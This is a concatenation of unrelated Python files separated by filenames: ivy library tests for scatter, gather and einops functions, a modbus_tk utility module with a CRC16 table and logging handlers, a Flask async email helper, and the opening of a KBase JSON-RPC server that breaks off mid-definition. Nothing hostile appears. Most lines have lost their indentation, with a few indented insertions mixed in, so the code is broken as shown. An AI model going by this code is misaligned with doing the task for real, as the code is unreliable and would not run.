red,
device=device,
)
),
)
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[
([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False),
([[0, 1, 2]], [1], [3, 3, 3], None, False),
(
[[0], [2]],
[
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
],
[4, 4, 4],
None,
False,
),
(
[[0, 1, 2]],
[1],
None,
[
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]],
],
False,
),
],
)
@pytest.mark.parametrize("red", ["sum", "min", "max", "replace"])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(
inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, device, call
):
# smoke test
if red in ("sum", "min", "max") and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, dtype="int32", device=device)
upd = tensor_fn(upd, dtype=dtype, device=device)
if tensor:
# pytorch variables do not support in-place updates
tensor = (
ivy.array(tensor, dtype=dtype, device=device)
if ivy.current_backend_str() == "torch"
else tensor_fn(tensor, dtype=dtype, device=device)
)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == "replace" and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, device=device)
true = np.asarray(
ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds),
ivy.to_numpy(upd),
shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor,
red,
device=device,
)
)
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis",
[
([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, with_out, tensor_fn, device, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype=dtype, device=device)
inds = ivy.array(inds, dtype="int32", device=device)
if with_out:
out = ivy.zeros(inds.shape)
ret = ivy.gather(prms, inds, axis, device=device, out=out)
else:
ret = ivy.gather(prms, inds, axis, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(
call(ivy.gather, prms, inds, axis, device=device),
np.asarray(
ivy.functional.backends.numpy.gather(
ivy.to_numpy(prms), ivy.to_numpy(inds), axis, device=device
)
),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds",
[
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
(
[[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]],
[[[0, 1, 0]], [[1, 0, 1]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, device, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype=dtype, device=device)
inds = ivy.array(inds, dtype="int32", device=device)
ret = ivy.gather_nd(prms, inds, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1] :]
# value test
assert np.allclose(
call(ivy.gather_nd, prms, inds, device=device),
np.asarray(
ivy.functional.backends.numpy.gather_nd(
ivy.to_numpy(prms), ivy.to_numpy(inds), device=device
)
),
)
# exists
@pytest.mark.parametrize("x", [[1.0], None, [[10.0, 9.0, 8.0]]])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, device, call):
# smoke test
x = tensor_fn(x, dtype=dtype, device=device) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.0], [2.0]), (None, [2.0]), ([[10.0, 9.0, 8.0]], [2.0])]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, device, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype=dtype, device=device) if x is not None else None
dv = tensor_fn(dv, dtype=dtype, device=device)
ret = ivy.default(x, dv)
# type test
assert ivy.is_ivy_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
def test_cache_fn(device, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions
# each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(device, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions
# each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(device, call):
if call is helpers.jnp_call:
        # Jax is the conflicting framework being tested against
pytest.skip()
def thread_fn():
x_ = jnp.array([0.0, 1.0, 2.0])
ivy.set_backend("jax")
for _ in range(2000):
try:
ivy.mean(x_)
except TypeError:
return False
ivy.unset_backend()
return True
# get original framework string and array
fws = ivy.current_backend_str()
x = ivy.array([0.0, 1.0, 2.0])
    # start jax loop thread, collecting thread_fn's result since Thread.join()
    # always returns None
    results = []
    thread = threading.Thread(target=lambda: results.append(thread_fn()))
    thread.start()
    time.sleep(0.01)
    # start local original framework loop
    ivy.set_backend(fws)
    for _ in range(2000):
        ivy.mean(x)
    ivy.unset_backend()
    thread.join()
    assert results == [True]
def test_framework_setting_with_multiprocessing(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_backend("numpy")
x_ = np.array([0.0, 1.0, 2.0])
for _ in range(1000):
try:
ivy.mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_backend()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_backend_str()
x = ivy.array([0.0, 1.0, 2.0])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_backend(fws)
for _ in range(1000):
ivy.mean(x)
ivy.unset_backend()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
# store original framework string and unset
fw_str = ivy.current_backend_str()
ivy.unset_backend()
# set with explicit handle caught
ivy_exp = ivy.get_backend(fw_str)
assert ivy_exp.current_backend_str() == fw_str
# assert backend implemented function is accessible
assert "array" in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert "cache_fn" in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_backend("numpy")
# assert the explicit handle is still unchanged
assert ivy.current_backend_str() == "numpy"
assert ivy_exp.current_backend_str() == fw_str
# unset global ivy from numpy
ivy.unset_backend()
def test_class_ivy_handles(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0.0, 1.0, 2.0], dtype="float32", device=device)
# create instance
ag = ArrayGen(ivy.get_backend())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_backend("numpy")
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx",
[([[0.0, 1.0, 2.0, 3.0]], "b n -> n b", [[0.0], [1.0], [2.0], [3.0]])],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0.0, 1.0, 2.0, 3.0]], "b n -> b", "mean", [1.5])]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx",
[
(
[[0.0, 1.0, 2.0, 3.0]],
"b n -> b n c",
{"c": 2},
[[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]],
)
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# container types
def test_container_types(device, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, "keys")
assert hasattr(cont_type, "values")
assert hasattr(cont_type, "items")
def test_inplace_arrays_supported(device, call):
cur_fw = ivy.current_backend_str()
if cur_fw in ["numpy", "mxnet", "torch"]:
assert ivy.inplace_arrays_supported()
elif cur_fw in ["jax", "tensorflow"]:
assert not ivy.inplace_arrays_supported()
else:
raise Exception("Unrecognized framework")
def test_inplace_variables_supported(device, call):
cur_fw = ivy.current_backend_str()
if cur_fw in ["numpy", "mxnet", "torch", "tensorflow"]:
assert ivy.inplace_variables_supported()
elif cur_fw in ["jax"]:
assert not ivy.inplace_variables_supported()
else:
raise Exception("Unrecognized framework")
@pytest.mark.parametrize("x_n_new", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, device, call):
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
new_val = tensor_fn(new_val, dtype="float32", device=device)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize("x_n_dec", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, device, call):
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
dec = tensor_fn(dec, dtype="float32", device=device)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize("x_n_inc", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, device, call):
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
inc = tensor_fn(inc, dtype="float32", device=device)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
# Still to Add #
# ---------------#
# is_ivy_array
# is_array
# is_ivy_container
# all_equal
# to_numpy
# clip_matrix_norm
# unstack
# value_is_nan
# has_nans
# exists
# shape_to_tuple
# try_else_none
# arg_names
# cache_fn
# current_framework_str
# get_min_denominator
# set_min_denominator
# get_min_base
# set_min_base
# stable_divide
# stable_pow
# get_all_arrays_in_memory
# num_arrays_in_memory
# print_all_arrays_in_memory
# set_queue_timeout
# queue_timeout
# tmp_dir
# set_tmp_dir
# supports_inplace
# assert_supports_inplace
|
utils.py
|
from __future__ import print_function
import sys
import threading
import socket
import select
import logging
LOGGER = logging.getLogger("modbus_tk")
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
def threadsafe_function(fcn):
"""decorator making sure that the decorated function is thread safe"""
lock = threading.RLock()
def new(*args, **kwargs):
"""Lock and call the decorated function
Unless kwargs['threadsafe'] == False
"""
threadsafe = kwargs.pop('threadsafe', True)
if threadsafe:
lock.acquire()
try:
ret = fcn(*args, **kwargs)
except Exception as excpt:
raise excpt
finally:
if threadsafe:
lock.release()
return ret
return new
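# Hedged usage sketch (illustration only, not part of the original module):
# threadsafe_function serialises concurrent calls through a shared lock unless
# the caller passes threadsafe=False to skip it. The helper below is purely a
# toy example of applying the decorator.
@threadsafe_function
def _demo_counter(state, step=1):
    """Increment state['value'] under the decorator's lock and return it."""
    state["value"] = state.get("value", 0) + step
    return state["value"]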
def flush_socket(socks, lim=0):
"""remove the data present on the socket"""
input_socks = [socks]
cnt = 0
while True:
i_socks = select.select(input_socks, input_socks, input_socks, 0.0)[0]
if len(i_socks) == 0:
break
for sock in i_socks:
sock.recv(1024)
if lim > 0:
cnt += 1
if cnt >= lim:
# avoid infinite loop due to loss of connection
raise Exception("flush_socket: maximum number of iterations reached")
def get_log_buffer(prefix, buff):
"""Format binary data into a string for debug purpose"""
log = prefix
for i in buff:
log += str(ord(i) if PY2 else i) + "-"
return log[:-1]
class ConsoleHandler(logging.Handler):
"""This class is a logger handler. It prints on the console"""
def __init__(self):
"""Constructor"""
logging.Handler.__init__(self)
def emit(self, record):
"""format and print the record on the console"""
print(self.format(record))
class LogitHandler(logging.Handler):
"""This class is a logger handler. It send to a udp socket"""
def __init__(self, dest):
"""Constructor"""
logging.Handler.__init__(self)
self._dest = dest
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def emit(self, record):
"""format and send the record over udp"""
data = self.format(record) + "\r\n"
if PY3:
data = to_data(data)
self._sock.sendto(data, self._dest)
class DummyHandler(logging.Handler):
"""This class is a logger handler. It doesn't do anything"""
def __init__(self):
"""Constructor"""
super(DummyHandler, self).__init__()
def emit(self, record):
"""do nothing with the given record"""
pass
def create_logger(name="dummy", level=logging.DEBUG, record_format=None):
"""Create a logger according to the given settings"""
if record_format is None:
record_format = "%(asctime)s\t%(levelname)s\t%(module)s.%(funcName)s\t%(threadName)s\t%(message)s"
logger = logging.getLogger("modbus_tk")
logger.setLevel(level)
formatter = logging.Formatter(record_format)
if name == "udp":
log_handler = LogitHandler(("127.0.0.1", 1975))
elif name == "console":
log_handler = ConsoleHandler()
elif name == "dummy":
log_handler = DummyHandler()
else:
raise Exception("Unknown handler %s" % name)
log_handler.setFormatter(formatter)
logger.addHandler(log_handler)
return logger
def swap_bytes(word_val):
"""swap lsb and msb of a word"""
msb = (word_val >> 8) & 0xFF
lsb = word_val & 0xFF
return (lsb << 8) + msb
def calculate_crc(data):
"""Calculate the CRC16 of a datagram"""
CRC16table = (
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040
)
crc = 0xFFFF
if PY2:
for c in data:
crc = (crc >> 8) ^ CRC16table[(ord(c) ^ crc) & 0xFF]
else:
for c in data:
crc = (crc >> 8) ^ CRC16table[((c) ^ crc) & 0xFF]
return swap_bytes(crc)
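def _demo_frame_with_crc(pdu):
    """Hedged usage sketch (illustration only, not part of the original
    module): append the CRC16 to a Modbus RTU PDU. calculate_crc() already
    swaps the bytes, so the value is packed big-endian straight after the
    payload, e.g. _demo_frame_with_crc(b"\\x01\\x03\\x00\\x00\\x00\\x0a")."""
    import struct
    return pdu + struct.pack(">H", calculate_crc(pdu))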
def calculate_rtu_inter_char(baudrate):
"""calculates the interchar delay from the baudrate"""
if baudrate <= 19200:
return 11.0 / baudrate
else:
return 0.0005
class WorkerThread(object):
"""
A thread which is running an almost-ever loop
It can be stopped by calling the stop function
"""
def __init__(self, main_fct, args=(), init_fct=None, exit_fct=None):
"""Constructor"""
self._fcts = [init_fct, main_fct, exit_fct]
self._args = args
self._thread = threading.Thread(target=WorkerThread._run, args=(self,))
self._go = threading.Event()
def start(self):
"""Start the thread"""
self._go.set()
self._thread.start()
def stop(self):
"""stop the thread"""
if self._thread.is_alive():
self._go.clear()
self._thread.join()
def _run(self):
"""main function of the thread execute _main_fct until stop is called"""
# pylint: disable=broad-except
try:
if self._fcts[0]:
self._fcts[0](*self._args)
while self._go.isSet():
self._fcts[1](*self._args)
except Exception as excpt:
LOGGER.error("error: %s", str(excpt))
finally:
if self._fcts[2]:
self._fcts[2](*self._args)
def to_data(string_data):
if PY2:
return string_data
else:
return bytearray(string_data, 'ascii')
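# Hedged usage sketch (illustration only): a WorkerThread keeps calling
# main_fct in a loop until stop() is requested; init_fct and exit_fct bracket
# the loop. Runs only when this module is executed directly.
if __name__ == "__main__":
    import time

    def _poll():
        time.sleep(0.05)

    worker = WorkerThread(_poll,
                          init_fct=lambda: print("worker started"),
                          exit_fct=lambda: print("worker stopped"))
    worker.start()
    time.sleep(0.2)
    worker.stop()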
|
email.py
|
# -*- coding:utf-8 -*-
# @author: lw_guo
# @time: 2020/12/7
from threading import Thread
from flask import current_app, render_template
from freefree.app import mail
from flask_mail import Message
def send_async_email(app, msg):
with app.app_context():
try:
mail.send(msg)
except Exception as e:
raise RuntimeError('Failure to send this email.') from e
def send_email(to, subject, template, **kwargs):
msg = Message('[FreeFree]' + subject,
sender=current_app.config['MAIL_USERNAME'],
recipients=[to])
msg.html = render_template(template, **kwargs)
app = current_app._get_current_object()
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return msg
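def send_welcome_email(to, username):
    # Hedged usage sketch (illustration only): the subject and the template
    # path 'email/welcome.html' are assumptions, not part of the original app.
    return send_email(to, 'Welcome', 'email/welcome.html', username=username)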
|
Coverage_CalculatorServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from Coverage_Calculator.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Coverage_Calculator'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Coverage_Calculator.Coverage_CalculatorImpl import Coverage_Calculator # noqa @IgnorePep8
impl_Coverage_Calculator = Coverage_Calculator(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
